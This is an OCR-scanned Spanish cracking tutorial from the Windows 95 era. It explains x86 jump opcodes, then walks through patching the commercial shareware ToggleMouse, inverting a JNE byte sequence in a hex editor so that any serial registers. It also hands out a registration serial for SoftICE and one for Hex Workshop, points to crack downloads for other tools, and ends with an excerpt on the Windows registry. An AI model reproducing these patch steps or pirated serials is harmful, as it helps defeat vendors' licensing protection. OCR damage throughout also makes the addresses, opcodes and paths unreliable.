0F82 jnae Salta si no esta sobre o igual 
0F82 jb Salta si es inferior 

0F83 jnb Salta si no es inferior 

0F86 jbe Salta si esta debajo o igual 


no esta debajo o igual 


0F87 jnbe Salta s 


OF8F jg Salta si es mayor 

OF8E jng Salta si no es mayor 

0F8D jge Salta si es mayor o igual 
0F8C jnge Salta si no es mayor o igual 
0F8C jl Salta si es menor 

0F8D jnl Salta si no es menor 

OF8E ¡le Salta si es menor o igual 
OF8F jnle Salta si no es menor o igual 


Según por lo que hemos visto hasta ahora los términos que nos podrían servir serían : 


Cmp xx,xx = (X = Registro) Compara valores de un registro y a sea AX,BX,CX,DX (Recordad que 
pueden ser de 32 bits, o sea, (EJAX, (E)BX, (E)CX, (E)DX.) .. Que recomendación podría darte 
cuando en futuros casos te encuentres con estas comparaciones ? :-Intercéptalas cuando están 


en plena comprobación-:] 


Jne xxxxx = Cuando saltes a una dirección por ejemplo; cuando saltes a una ventana de error 
diciendo que te registraste mal, y estés después de una comprobación ... :-Revierte los saltos! 
así pensará que no es equivalente-:, me explico, si nos encontramos con una operación de 


registro que dice así: 


014F:00401DD 3BC7 Cmp eax, edi 


014F:00401DE 
0F85061DC1FF 


; 000401DF es una dirección de 
Jjne 00401DF ejemplo, cuando tengamos que 
desensamblar un programa será así. 


El texto solo por ejemplo de lo que 


014F:00401DF Registro Falló sería un registro fallido. 


Lo que podemos hacer aquí es "invertir" el salto tal como lo mencionamos anteriormente... lo que 
está en COLOR lo puse así para que reconocieran que esta es la instrucción en hexadecimal, 
para invertir miremos la tabla que tenemos arriba, tendríamos que cambiar la instrucción 
0F85061DC1FF por 0F84061DC1FF ... en muchos otros casos más se puede usar este método... 
no solo en la instrucción JNE, también se puede usar en otras instrucciones, así, estaremos 
revirtiendo la comprobación, y pensará ... : La comprobación original tiene esta apariencia : 'Si no 
es el número correcto, entonces, saltará al error' ... pero la cambiaremos para que diga .. 'Si el 
número no es correcto... entonces... registro Exitoso!'... así estaremos burlando la protección 
del programa; pero nos podremos encontrar algún día con alguna protección así: 

:004049CD 755A ¡ne 00404429 

Lo que podemos hacer es hacer que sea un salto 


directo, o sea reemplazando 755A con EB5A .así 
quedaría en un JMP 00404A29... 


Todavía los tengo enredados con la parte teórica, 
pero con los ejemplos nos acostumbraremos con 
los ejemplos que tendremos .. 


Test xx,xx = Estas instrucciones no se las he mostrado, pero también son rutinas de verificación, 
también podemos poner una interrupción aquí. 


Enfatizando kon las herramientas 


Tendremos que usar nuestras herramientas, acostumbrarnos a ellas, sentirlas, experimentar, 
provocar errores, aprender de ellos. 

usemos nuestras herramientas, vamos a probar con ellas, descarguemoslas todas desde una sola 
Vez ... 


Depuradores 


Soft-lce :-Nuestro añorado depurador, descarguemos la versión completa Aquí, vamos a 
descargar la versión 4.0 para Windows 95., ya que no necesitaremos más que eso. Si no me 
equivoco son 16 Mb. Si es que no funciona, prueben esta. Podremos usar este con mayoría, será 


nuestro depurador. 


Configuración se Soft-1CE: Desde ahora le llamaremos SICE, y cuando lo instales deberás 
correr por las siguientes configuraciones . . ., desde la 1ra configuración hasta la 3ra serán 
configuraciones de instalación. 


1ro: Requerirá de una contraseña: Cómo todavía no les he enseñado nada, les daré la 
contraseña : 4111-36143B-B7 


Desde ahora a las contraseñas les llamaremos seriales 


2do: Configuración de tarjeta de vídeo: Softlce prácticamente detectará tu tarjeta de vídeo, si es 
que no es así, elije la tarjeta 'super vga'. Deberás hacer la prueba de vídeo con el botón 'test'. 


3ro: Modificación de tu AUTOEXEC.BAT: deberás saber que es tu autoexec.bat, si no sabes lo 
que es el autoexec.bat, puedes rendirte.. abandona este curso... si lo sabes, Softlce se cargará en 
tu Autoexec.bat para que se inicie cada vez que parte tu computador. Si es que te llegan a ocurrir 
esos típicos errores de Windows, SICE se cargará, antes del error y a veces puede ser molesto y 
a veces puede dejar el error más grande aún. Así que te recomiendo que cuando comenzemos a 
crackear no lo cargues en el autoexec.bat, si no crea un bat. Si es que lo instalaste en nuestro 
directorio CArchivos de programaNNumega'softlicel . Podré ayudarte, pon esta línea en un 
bat. Si es que elegiste que no modificara tu autoexec. deberás salir de windows en modo 
ms-dos, y cargar el bat.. 


CAARCHIV=-IANUMEGANSOFTIC- 1IXWINICE.EXE 


4to: Una vez instalado lanzar Symbol Loader: deberás lanzar el 'symbol loader, ir al menú edit, 
luego a SoftICE initialization settings. en donde dice 'Initialization string' debes poner 
X;wl;wr;wd7; code on;, y en donde dice "History Buffer size (KB)' debes poner '512". 


5to: Con un editor de texto: Debes abrir el fichero 'Winice.dat' que esta el el directorio en donde 
instalaste el SICE, y habrán líneas en donde se dice '¡EXP=', a todas las líneas deberás quitarle 
el ';' al comienzo para que queden así 'EXP='. Mas tarde explicaré el porqué de esto. 


6to: Una vez hechos los cambios: Reiniciar el equipo para poder lograr la completa 
actualización de los cambios que hemos hecho, para todo este explicado mas ampliamente está 
un tutorial en ECD de cómo configurar SoftlCE 


Desensambladores 


WDasm :-No es el mejor, pero lo utilizaremos al comienzo, para seguir avanzando, es un 
desensamblador. Luego comenzaremos a utilizar el llamado IDA (Interactive DiISassembler) 
puedes descargarlos de una serie de mirrors, como siempre les daré 2 solamente,este y este. 


IDA (Interactive DiSassembler) :-El mejor desensamblador, todo lo teórico que he hablado se 
entenderá en cuanto hagamos nuestro ejemplo volar por las nubes. Lamentablemente los mirros que 
tengo, uno es de la versión nueva y otro de una versión mas antigua. 


Editores Hexadecimales 


UltraEdit 6.x :-Uno de los mejores editores hexadecimales, gracias a dios que el shareware lo 
reparten gratuitamente en http://www. ultraedit.com , pronto aprenderemos a crackear nuestras 
propias herramientas, es lo primero que debemos hacer. Este lo vamos a dejar para el segundo 
capitulo, les regalaré el crack de todas las siguientes herramientas por el solo hecho de ser 
principiantes. 


Hex Workshop 2.54 :-Otro de los mejores editores existentes, también requiere de crackeo .. se 
puede descargar aqui . Y el serial de este programa es : B5-45678. 


Hacker's View 6 :-Para mi simplemente el mejor editor existente... NO SE FIJEN EN MI 
PALABRA! ENCUENTREN SUS HERRAMIENTAS FAVORITAS! descarguen Hacker's View aquí y el 


crack por aquí. 


La primera Aproximación 


He aquí nuestra primera aproximación, nuestro objetivo fue escogido al azar, y es un típico ejemplo de una combinación serial/fácilismo, debo 
mencionar que podremos seguir con muchas protecciones distintas. Empezaremos con protecciones fáciles y luego seguiremos con distintos 
esquemas de protección, aumentando así nuestro nivel poco a poco. 


Ejemplo n*1 : 

Nombre : ToggleMouse Tamaño del ejecutable: 618.486 Bytes 

Versión : 3.4.3 Ubicación : http://kutcracks.virtualave.net/kutfilez/toggle.zip 

Nombre del ejecutable : Togglemouse.exe Tamaño del zip:418 Kb 

Características : Programa que permite generar utilidades con el Mouse Protección : Sencilla 

Tiempo estimado : 20 Minutos (Para ayudar a los principiantes) Tipo de protección : Serial*Registro*Tiempo 

Precio : 14.95 Dólares americanos + 4.00 por compra y resguardo en diskette Limitaciones : 30 Días de prueba + 7 Días de terminación extra + Una pantalla que 
Herramientas a utilizar : WDasm, Editor hexadecimal, Zen Cracking. nos dice que tenemos que registrarnos. 


Primero que nada tenemos que familiarizarnos con el programa, ejecutemoslo, exploremos, y por un momento olvidemonos que se tiene que 
comprar, exploremos, miremos, probemos, enfatizemos con el programa. Después de hacer varias pruebas con el programa, le doy 2 puntos y 
medio de 5, fue de mi agrado. Recordemos que solo crackeamos para extender el periodo de prueba de un programa para probarlo al máximo de 
sus capacidades. Y para aprender de él. En este caso estudiaremos este programa paso a paso para ver qué es lo que hace y cómo lo hace .. 
¿Listos para comenzar? 


4.1 -Teórico, ahora, práctico. 


Ok, vamos a abrir este bebé, se preguntarán qué es el zen cracking.. le llamaremos Zen Cracking a la manera en que usamos nuestra mente 
para pensar en cómo funciona un programa, y por donde atacaremos ... algo así, no se puede explicar, sin embargo ud. mismos lo aprenderán en 
el transcurso de este largo curso, sin que yo les diga poco a poco de que se trata. Vamos a empezar por averiguar el cómo usar nuestras propias 
herramientas, al mismo tiempo que vamos interactuando con el programa, te recomendaría que imprimieras este curso ya que con reiniciar e 


instalar softice y las herramientas se verá difícil estar cambiando de ventanas para leer mientras tratas de crackear el programa. 


e Empezemos con nuestro amado programa, primero que nada, instalemos el WDasm, y corramos su ejecutable, apareceremos en una 
ventana típica de programas hechos en Windows, en el menú Disassembler. Open file to disassemble. Ahora, abramos nuestro 
ejecutable 'togglemouse.exe', y verán cómo la barra avanza la barra de progreso. Cuando termine, no empezaremos a crackear 
enseguida, si no que exploraremos las funciones de Wdasm para conocerlo mejor. Primero, conoceremos las referencias de datos 
(String data references). Si prestas atención a un botón a la esquina superior derecha. Al lado del botón de la impresora. Miremos la 
figura a continuación: 


pl 


a LS 


ZOde 
15) XA 


sabemos que si presionamos el primer botón abriremos otro archivo, si presionamos el segundo botón, guardaremos en un archivo el 
otro archivo ya desensamblado. Para este caso, usaremos referencias de cadenas, presionemos en aquel botón y veremos un listado de 
diferentes cadenas a las cuales llama el programa. Ejecutemos el programa ToggleMouse, en este caso veremos una carpeta que dice 
'Order' (Ordenar), y aparecerá un botón que nos parecerá interesante... 'Click here to enter your registration code'(click aqui para 
poner tu código de registro). Le daremos un click y veremos una ventana diciendo que pongamos nuestro nombre, compañia, y 
nuestro código de registro(serial). Escribamos un nombre p.e. '"MENIAC PC', luego, una compañia p.e. 'KUt', y un serial cualquiera 
como '1234567890"'... aparecerá un diálogo diciendo 'The registration information you have entered is not valid. Please confirm 
that you have entered the information exactly as it was provided", tienes que saber aunque sea un poco de inglés básico para saber 
que esto es decir 'La información escrita no es válida. Por favor confirme que ha escrito la información tal como se le fue 
dado'...Nuestro objetivo por esta vez en Wdasm, será buscar cadenas relacionadas con registros(o sea, diálogos de compra y serial) .. 


busquemos y las cadenas que me aparecieron y encontré algo fueron: 


String Resource ID=00157: 


String Resource ID=00158: 
String Resource ID=00159: 
String Resource ID=00160: 
String Resource ID=00161: 
String Resource ID=00162: 
String Resource ID=00163: 
String Resource ID=00164: 
String Resource ID=00165: 
String Resource ID=00166: 
String Resource ID=00167: 
String Resource ID=57344: 
String Resource ID=61446: 
String Resource ID=61472: 
String Resource ID=61473: 
String Resource ID=61474: 


String Resource ID=61475 


"EconoClick has saved you %d clicks." 


"You haven't taken advantage of the EconoClick feature." 
"You've clicked %d times, double-clicked %d times, right-clic" 
"You haven't used the PopDesk feature yet." 

"You have used the PopDesk feature %d times.” 

"Your web browser will now be started and the Toggle Software" 
"Your web browser could not be started automatically. Please " 


Registration is Complete! Thank you very much for registeri” 


"The registration information you have entered is not valid." 


"Dear Customer,Our registration system has changed and in o” 
"On some systems, color scrolling cursors may flicker while y" 
"ToggleMOUSE" 

"an unnamed file" 

"No error message is available." 

"An unsupported operation was attempted." 


"A required resource was unavailable." 
: "Out of memory." 


He remarcado las cadenas queme parecieron interesantes, si te acuerdas, la segunda que remarqué te parece conocida .. ¿Verdad?.. y la 
primera si es que te diste cuenta es la cadena que te dice que te registraste bien, en el cuadro de diálogos de Wdasm demosle click 
sobre la cadena 'Registration is Complete!...' para ver de que se trata, pero realmente no nos interesará esto ya que buscamos el por 
qué se produjo el error, o sea, demosle doble click a la cadena 'The registration information ...' y veremos lo siguiente : 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0040E82A(C) 


o 

o 

o | 

O  :0040ESDF 6AFF push FFFFFFFF 

o :0040E8E1 6A10 push 00000010 

o *Possible Reference to String Resource ID=00165: "The registration information you have entered is not valid." 
o 

o 

o 

o 


:0040E8E3 68A5000000 push 000000AS 
:0040E8E8 E840F70100 call 0042E02D 
:0040E8ED EB2F ¡mp 0040E91E 


[0] 


e Con esto los tengo confundidos, ya que hay 2 cosas que no les enseñe de ensamblador antes, la función push, y call, a call, tal como lo 


suena su nombre en inglés 'llama' a funciones. En este caso llamará a otras funciones para que se ejecuten (¡ne,mov, etc.) 


Daré este código pequeño para que vean de que se trata la función 'call". 


mov ax,23h ; mueve el valor de 23 a AX 

call muevete ; llamada a 'muevete 

Xor ax,ax 

xor bx,bx 

muevete: : declara la función 'muevete' 

mov bx,24h ; mueve el valor 24 a BX 

ret ; otra función no vista, ret 'retorna' a la función.., retorna desde el call hacia adelante. 


Una vez terminada la función 'muevete' volverá a la instrucción siguiente después de la 'llamada', o sea, seguirá desde el 
xor ax,ax en adelante por el ret, y con esto dejará a AX y BX en 0. Por las instrucciones XOR. 


El comando push pone un valor en el tope de la 'pila', me explico. Si decimos como arriba push 00000000 sería mover el valor a la 
memoria. O sea como mover el valor 00000000 (Que es igual a 0) a la memoria6 para que quede con ese valor, esta memoria es como 
'la cima' de los registros. (Como dice Ed!son, el Push es para guardar valores para su uso posterior) 

Sigamos con lo nuestro, tenemos la palabra "The registration information you have entered is not valid.", pero si prestamos atención 
veremos que arriba tiene escrito ' Referenced by a (U)nconditional or (C)onditional Jump at Address:' lo que significa "Tiene una 
referencia de un salto (c)ondicional o (i)ncondicional de la dirección", esto quiere decir que la instrucción de error ("The 
registration information ...) Fue llamada desde una dirección, y nos aparece el siguiente texto: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040E82A(C) 


Para esto quiere decir que la cadena de error fue llamada desde la dirección 0040E82A, tenemos que presionar el botón 'IR A 
UBICACIÓN, o ir al menú 'Goto' (Ir a..) y ver 'Goto Code Location'.. y escribiremos la dirección de la cuál se llama, o sea 
0040E82A, iremos ahí y nos encontraremos con el siguiente pedazo de código: 


* Possible Reference to Dialog: DialoglD_7801, CONTROL_ID:0064, "" 


| 

:0040E794 6A64 push 00000064 

:0040E796 8BC3 mov eax, ebx 

:0040E798 33D2 xor edx, edx 

:0040E79A 59 pop ecx 

:0040E79B F7F1 div ecx 

:0040E79D FF7508 push [ebp+08] 
:0040E7A0 8BF0 mov esi, eax 

:0040E7A2 8BDE mov ebx, esi 

:0040E7A4 81F321332153 xor ebx, 53213321 
:0040E7AA E8E1570000 call 00413F90 
:0040E7AF 3DD7E7FC0O cmp eax, DOFCE7D7 
:0040E7B4 59 pop ecx 

:0040E7B5 0F8434010000 je 0040E8EF 
:0040E7BB FF7508 push [ebp+08] 
:0040E7BE E8CD570000 call 00413F90 
:0040E7C3 3DO00A02E02 cmp eax, 022£A000 
:0040E7C8 59 pop ecx 

:0040E7C9 0F8420010000 je 0040E8EF 
:0040E7CF FF7508 push [ebp+08] 
:0040E7D2 E8B9570000 call 00413F90 
:0040E7D7 3DF87A4138 cmp eax, 38417AF8 
:0040E7DC 59 pop ecx 


:0040E7DD 0F840C010000 je 0040E8EF 
:0040E7E3 FF7508 push [ebp+08] 

:0040E7E6 E8A5570000 call 00413F90 
:0040E7EB 3D9EB18C00 cmp eax, 008CB19E 
:0040E7FO0 59 pop ecx 

:0040E7F1 0F84F8000000 je 0040E8EF 
:0040E7F7 FF7508 push [ebp+08] 

:0040E7FA E891570000 call 00413F90 
:0040E7FF 3DD713B200 cmp eax, 00B213D7 
:0040E804 59 pop ecx 

:0040E805 0F84E4000000 je 0040E8EF 
:0040E80B FF7508 push [ebp+08] 

:0040E80E E87D570000 call 00413F90 
:0040E813 3DF6336A2C cmp eax, 2C6A33F6 
:0040E818 59 pop ecx 

:0040E819 0F84D0000000 je 0040E8EF 
:0040E81F FF7508 push [ebp+08] 

:0040E822 E869570000 call 00413F90 
:0040E827 3BC6 cmp eax, esi 

:0040E829 59 pop ecx 

:0040E82A OF85AF000000 jne 0040E8DF 
:0040E830 E84B3B0200 call 00432380 
:0040E835 8B4004 mov eax, dword ptr [eax+04] 
:0040E838 56 push esi 

* Possible StringData Ref from Data Obj ->"Registration" 


| 
:0040E839 BEC4264400 mov esi, 00442604 


He remarcado claramente la instrucción que llama al error, en mi primer ejemplo de ensamblador, puse un Jne acaba, y en este caso 
llamamos a un Jne 0040E8DF, no se preocupen, cuando se programa en ensamblador, se etiquetan las instrucciones como acaba, 
digamos que es lo mismo pero que en vez de etiquetas como 'acaba' se etiquetan cuando se desensambla en direcciones tales como 
'0040E8DF"... Tal como les dije en unas páginas atrás, ¿Qué haremos con esta instrucción que salta si no es equivalente?.. exacto!, la 
revertiremos de una manera de la cuál pensará que estamos registrados correctamente si escribimos un código erroneo.. pero.. 
¡Cuidado!, vamos a aprender que si es que revertimos el salto ahora ... pensemos un poquito .. si lo revertimos para que si escribimos 
un serial incorrecto piense que es correcto .. ¿Qué pasará si escribimos el serial correcto? .. BUM! el error se arrojará en ese caso .. 
pero .. hey! antes de que hagas cualquier tipo de cambio como bestia salvaje sin nada que hacer mas que reventar unos bytes. vamos a 
lanzar el monitor de registro del sistema. para observar si es que el programa produce cambios en el registro de Windows.. Más tarde 


se explicará que és el registro de Windows. Puedes descargar el monitor de registro aquí o puedes usar este otro. 


4.1.0 -Una pequeña explicación. 


Si es que miramos arriba del salto jne 0040E8DF podemos observar una call. 


:0040E822 E869570000 call 00413F90 


:0040E827 3BC6 cmp eax, esi 

:0040E829 59 pop ecx 

:0040E82A 0OF85AF000000 ¡ne 0040E8DF 
:0040E830 E84B3B0200 call 00432380 


Si es que recuerdas, 'push' era para mantener un valor temporalmente en la cima de la memoria, el comando mencionado aqui ('pop”) 
obtiene el valor del 'push' puesto en la cima de la memoria y al mismo tiempo le agrega 2 unidades, más tarde hablaremos de estas 
llamadas 'unidades'. En este ejemplo, el pop obtiene el valor de la cima de ecx. ¿ Y para que menciono además del pop a la función 
call ?.. puesto que antes del salto al error, (¡ne 0040E8DF,) se llama a este famoso call que va a la dirección en la cuál se comprueba el 
serial que has escrito, y si recuerdas, después de comprobar todo este famoso enredo vuelve (Un RET) y Salta si no es equivalente el 


serial que has escrito .. ¿Ves que no es tan difícil como parece?. 


Al Atake 


Lancemos ahora tu editor hexadecimal, abre el ejecutable de ToggleMouse(ToggleMouse.exe) y vayamos al 
menú 'Edit' y luego 'Replace' busquemos la cadena hexadecimal de JNE (Tal como lo expliqué arriba) 
0F85AF000000 y lo reemplazaremos con la instrucción JE(La inversa) que es 0F84, o sea que sería 
0F84AF000000. Usa para esto UltraEdit o Hex WorkShop, el hacker's view funciona de otra manera que 


explicaré en otro capítulo. 


Una vez que hayamos guardado los cambios, iniciemos ToggleMouse con el monitor de registro abierto y 
reluciente esperando a su víctima ser acosada. Vayamos al menú order, presionemos 'enter regitration code", 
escribamos el nombre que queramos registrar, una compañia, y cualquier número serial, presionemos 'Ok' y 
veamos que sucede .. 'Registration Complete! thank you very much for registering ..' ... estamos registrados, 
no estemos contentos con eso, hemos descubierto una estúpida protección. Pero todavía no se acaba esto!, 
tenemos que aprender más y más del programa, no solo trata este curso de matar y matar, sino, el verdadero 


conocimiento en sí!, ahora, veamos el monitor de registro.. dice que se abrió y creo una clave en : 


HKEY_CURRENT_USER'Software'Toggle SoftwarelToggleMOUSE Registration 


¿Poco imaginativo no .. ?... Bueno, veamos lo que tenemos aqui, en mi caso, puse como nombre 
a : MENIAC PC, de compañia a : KUt99, y después, nos vamos a 'ejecutar' en el menú de Inicio 
de Win95, y escribimos 'regedit', lanzamos con esto al editor de registro de configuraciones, 
presionamos F3 para Buscar, y escribimos ToggleMOUSE, después de una búsqueda los 
encontraremos por aquí, en nuestra izquierda deberíamos tener lo siguiente: 


" ToggleSoftware 


"ToggleMOUSE 

"Blink 

"PanicStopper 

"QuikScroll 

"Registration <- Esta es la cadena interesante. 
Demosle un click y apareceremos por aquí a la derecha : 


Nombre Datos 

ab] Predeterminado) (valorno establecido] 
[ab] Company "Kut99" 

[ab] Name "MENIAC PC" 

E] RegNumber 0x01da1cf0 (31071472) 


Tal como podemos apreciar tenemos la compañía ; (KUt99), el Nombre; (MENIAC PC) y 
el número de registro para estos dos nombres, (31071472) .. Vamos a tener un grave 
problema si no utilizamos los mismos nombres y compañia, podríamos probar eliminando 
todos estos valores (Excepto siempre el que dice (predeterminado)).. explicación de lo 
dicho, el programa, para generar su propio número serial, hace sus propias operaciones 
algebráicas con letras, o sea, para cada letra que se genere, hará su propia 
multiplicación, división, étc. esto se explicará más adelante en un capítulo mas avanzado. 
Tomemos por ejemplo otra operación de un programa inventado, o sea, en el programa 
dice 'Nombre' y 'serial'. Imaginense que el programa tiene como función poner en este 
caso, que si como nombre tenemos una 'm' minúscula esta vale 8, y si es mayúscula esta 
vale 3, ¿ok?, y si ponemos una 'm' junto con una 'a' hará una operación matemática 
complicada... traten de entenderlo superficialmente, ya que se estudará esto más tarde 
con más interés en ello. 


»- 
Vi 


El Registro de Windows 


Lo siguiente es un trozo del Proyekto Nakarko. 


Saludos peñita! Aquí estoy otra vez después de unas largas y merecidas vacaciones... voy a hacer un ligero paréntesis y en este 
manual no voy a explicaros ningún crack, otra vez será amiguetes... En esta ocasión voy a tratar de explicaros tooodito sobre una 
de las "armas" para cracking que el patético Windown pone a nuestro servicio, el Registro. 


El principal motivo por el que escribo este texto es superar la vagancia en la que estoy sumido, hace tiempo que no me trago un 
mísero manual, pues bueno aprovecho mis indagaciones en este temita y para hacerme más amena la lectura os sirvo este texto, a 
ver si os vale de algo... 


Este manual no está dirigido esencialmente al cracking, es más bien una *.HLP de esos que M$ nos regala que puede ser 
interesante tanto para un usuario cualquiera como para los programadores de aplicaciones para su pseudo-SO. 


¿? Loading Data...Qué es el Registro de Windown 


El registro es una base de datos definida por el sistema que tanto w95 como las aplicaciones que sobre él funcionan utilizan para 
guardar y obtener información sobre determinadas configuraciones, en él podemos encontrar desde las extensiones asociadas a 
cada programa, el lugar donde están determinadas dlls, el contenido de menús desplegables, los drivers necesarios para nuestro 
hard... hasta las últimas urls que hemos visitado. Casi un 100% de lo que en nuestro PC ocurre está grabado en el registro, poco 
escapa de sus garras... 


La información que se guarda en nuestro registro es información en binario, esta información varia dependiendo de la versión de 
windown en uso y del hard/software que tengamos instalado. 


Para manipular la información del registro podemos hacerlo manualmente usando algún proggie que nos lo permita o utilizando las 
funciones del registro (para programadores), este tema lo tocaremos más adelante. 


El registro está dentro de dos archivos, system.dat y user.dat que suelen ser de tamaño aberrante (+2megas). 


El registro es accesible y modificable gracias (entre otros) al REGEDIT.EXE uno de los muchos programas "escondidos" en el 
directorio Windows. 


¿? Estructura del registro. 


El registro almacena datos en forma de árbol jerarquizado, cada rama del árbol es llamada “Key”, cada "Key" puede contener 
"SubKeys" y entradas de datos llamadas "Values". Para haceros una idea de cómo es esto imaginaros "Key" como un directorio 
donde hay subdirectorios "Subkey" y ficheros con datos "Values". 


Muchas veces la presencia de una "Key" es lo único que necesita un programa para funcionar, otras veces nos encontramos con 
uno o varios "Subkeys" y/o "Values" dentro de una "Key", una "Key " puede tener tantos "S" y "V" como necesite y los "Values" 
pueden estar en cualquier formato. 


Cada "Key" tiene un nombre que consiste en 1 o más caracteres imprimibles en formato ANSTI, esto es, caracteres con valores de 
rango 32-127, estos nombres no pueden empezar por " (backslash o antibarra) ni por "* ó ¿". Las "Key" que comienzan por un 
punto (. ) están reservadas. 


Cada "Subkey" sólo está definida en la "Key" inmediatamente superior al nivel donde la "Subkey" se aloja, de esto sacamos dos 
cosas, dentro de diferentes "Key" podemos tener "Subkeys" de nombre idéntico y además estas "Subkeys" no tienen por qué tener 
nada que ver, cada rama del registro es independiente de las demás a no ser que dentro de la rama se explique la relación 
existente entre las dos. 


¿? Ramas del Registro 


Antes de escribir un dato en el registro una aplicación debe abrir una "Key", para abrir una nueva "Key" la aplicación en cuestión 
debe apoyarse en otra "Key" ya abierta, el sistema proporciona varias "Keys" que siempre se mantienen abiertas como soporte para 
las nuevas "Keys", las apliaciones usan estas "Keys" standard como "entrada" al registro. 


Vamos a ver qué es lo que tienen cada una de estas "Keys", he tratado de seguir el orden tal cual aparece al abrir el Regedit y he 
omitido partes "engorrosas" para hacer más fácil de seguir este papiro y espero que así sea porque esto es un tocho del horror... 


Al abrir nuestro registro con el Regedit.exe u otro programa que nos permita esto nos encontramos con: 


HKEY_CLASSES_ROOT: aquí tenemos registradas todas las extensiones, tipos de archivo. 


HKEY_CURRENT_USER: detallado de las configuraciones del usuario actual. 

HKEY_LOCAL_MACHINE: Configuraciones de nuestro PC tales como dónde está nuestro software y dónde los drivers instalados. 
HKEY_USERS: las configuraciones de los usuarios de ese PC (urls visitadas, aplicaciones favoritas...). 
HKEY_CURRENT_CONFIG: una especie de especificación de LOCAL_MACHINE, más detalles de la configuración actual. 
HKEY_DYNAMIC_DATA: la información "dinámica", se "forma" al encender el ordenador y desaparece al apagarlo. 


Podemos considerar lo anterior como grandes árboles, al abrir cualquiera de las anteriores ramas nos encontramos montones de 
hojas llenas de información, a continuación un detallado de cada una de estas ramas... 


¿? HKEY_CLASSES_ROOT (HKCR) 


En el GUI "graphic user interface" de windown todo (cada archivo, directorio, disco, etc. ) es considerado como un objeto, cada 
objeto tiene asociadas unas propiedades, esta rama ("Key") del registro contiene un listado de los objetos y de sus propiedades, por 
ejemplo *.mid, todos sabemos que son archivos de sonido, pues al abrir HKCR y la "Subkey" .mid veríamos lo siguiente: 


Nombre: Datos: 
(predeterminado) "midfile" 
Content Type "audio/mid" 


Pues tenemos un objeto "midfile" con propiedades "audio/mid", es decir, midfile está asociado a audio/mid, un cambio de este 
"Value" nos dejaría sin poder escuchar la macarena en los bonitos scripts de mIRC... vale la pena cambiarla? ;P 


Las principales funciones de estas claves son: 


1? Asociar la extensión de un archivo a un tipo de objeto. 


2* Asociar un icono a un tipo de objeto. 


3* Asociar una serie de acciones de la línea de comandos a un tipo de objeto. 


4* Asociar las opciones de los menús contextuales (desplegables) a un tipo de objeto. 


5* Definir lo que aparecerá en la ventana de propiedades (right-clickapropiedades) para cada tipo de objeto. 


Como habréis deducido cambiando un "Value" podemos asociar un tipo de archivo a un determinado programa, cambiar el icono de 
un tipo de archivo, añadir o quitar nuevos tipos de archivos, etc. Etc. 


Dentro de KCR distinguimos tres tipos de "Subkeys": 


a) Extensiones de archivos, asocian las extensiones con los tipos de objeto. Más clarito, estas "Subkeys"” se ocupan de decir 
qué hace windown con cada tipo de archivo (archivos que llevan asociadas determinadas acciones), qué menús despliega al 
hacer right-click sobre él y las propiedades que se muestran al acceder a este menú. Son de este tipo "Subkeys" como .arj, 
.com, .cab, etc. 


b) Tipo de objeto, define un objeto en función de sus menús desplegables, sus propiedades, su icono y sus enlaces CLSID 
(tratado a continuación). 


Cc) CLSID, nos da información OLE (object linking and enbedding, una aplicación es llamada por otra automáticamente para 
editar datos) y DDE ( dynamic data exchange, intercambio de datos entre dos aplicaciones) sobre tipos de objeto, también 
puede contener información sobre los menús contextuales, propiedades e icono. Es importante saber que cada "Subkey”" 
CESID es única o al menos eso aseguran desde M$ donde se curraron un programilla sólo para este temita (generador de 
claves de 32 dígitos en hexa...). Es una clave bastante importante en el cracking puesto que gracias a ella podremos conocer 
métodos de direccionamiento de memoria y enlaces a dlls con funciones OLE ( GetDlgltem, Istrcmp.....). 


Al abrir el registro con nuestro regedit.exe y echar un vistazo a KCR nos encontramos que dentro de muchas de las "Subkeys" hay 
otras "Subkeys" tales como: 


a) Shell: determina acciones tales como abrir, imprimir, copiar, etc. Por ejemplo una "Subkey" de este tipo determina que 
reproductor multimedia abre nuestros archivos *.mid. La rama para abrir y ejecutar estos archivos sería: 


[HKEY_CLASSES_ROOT|midfilelshell] 


(E= "Play" 


[HKEY_CLASSES_ROOTmidfilelshelllopen] 


(O="Abrir" 


[HKEY_CLASSES_ROOTImidfilelshelllopenlcommana] 


(O="CAMWINDOWS!UWrundIl32.exe CIWINDOWSUSYSTEMVNamovie.ocx, RunDIl /open %1" 


[HKEY_CLASSES_ROOT midfilelshelliplay] 


(O="Reproducir" 


[HKEY_CLASSES_ROOT midfilelshelllplaylcommana] 


(O="CMIWINDOWS!Wrundll32.exe C:IWINDOWSUSYSTEMVlamovie.ocx, RunDIl /play /close %1" 


b) Shellex: contienen "Subkeys" que determinan las funciones OLE y DDE para cada tipo de objeto, no son más que cadenas 
numéricas que apuntan por ejemplo a la dll que ejecuta una determinada operación y definen las propiedades de sus menús 
contextuales. 


Cc) Shellnew: contienen el valor de la cadena numérica del comando u orden que determina la apertura de un nuevo objeto. 
Un ejemplo muy sencillito es la clave *.BMP cuya shellnew nos indica el programa con que editaremos una nueva imagen de 


este tipo. 


a) Default Icon: contienen el valor de la cadena numérica que nos indica el icono por defecto de cada tipo de objeto, 
normalmente apuntarán al shell32.dll, pifmgrd.dll ( enWwindowsnsystem) o moricons.dll ( en Wwindows) tal que al primer icono 
de la lista le asigna el O al siguiente el uno y así sucesivamente de la siguiente manera: 


CAWindowsWmoricons.dll,O 


¿? HKEY_CURRENT_USER (HKCU) 


Las "Subkeys" de esta "Key" contienen las configuraciones del actual usuario, en caso de ser una máquina con un único usuario 
esta clave es casi idéntica al DEFAULT de HKEY_USERS. Lo que en ella tenemos es todas las preferencias que en algún 
momento hayamos puesto añadidas a todas las configuraciones por defecto. Contiene toda la información sobre el sistema que no 
tiene HKEY_LOCAL_MACHINE, esto es, configuraciones del software y preferencias del usuario. Es una parte del registro que 
podemos cambiar casi sin riesgo de causar un estropicio, casi todas las opciones contenidas en esta clave son modificables desde 


algún "peso pesado" del Windows, como el panel de control, la barra de tareas, cualquier menú de propiedades... 


Dentro de esta "Key" y con la vista puesta en el cracking la clave |Software es de los más jugosa, en ella encontramos desde 
números de serie hasta jodiendas que nos imposibilitan registrar la aplicación pero esto viene luego... ;P 


En esta "Key" nos encontramos con: 


a) lAppEvents: nos define los sonidos y otras mingadas ( masterCaR-d-19 feo ;P. ) con las que windown nos aturde siempre 
que ejecutamos un programa, metemos la gamba y ezetera ezetera al cubo... EventLabels nos da el nombre de la mingada, 
SchemesApps la localización de las mingadas y SchemeNnames pues el nombre del tema. 


b) ¡Control Panel: contiene las "Subkeys" que nos definen la apariencia de nuestro windown (el color de las ventanas, su 
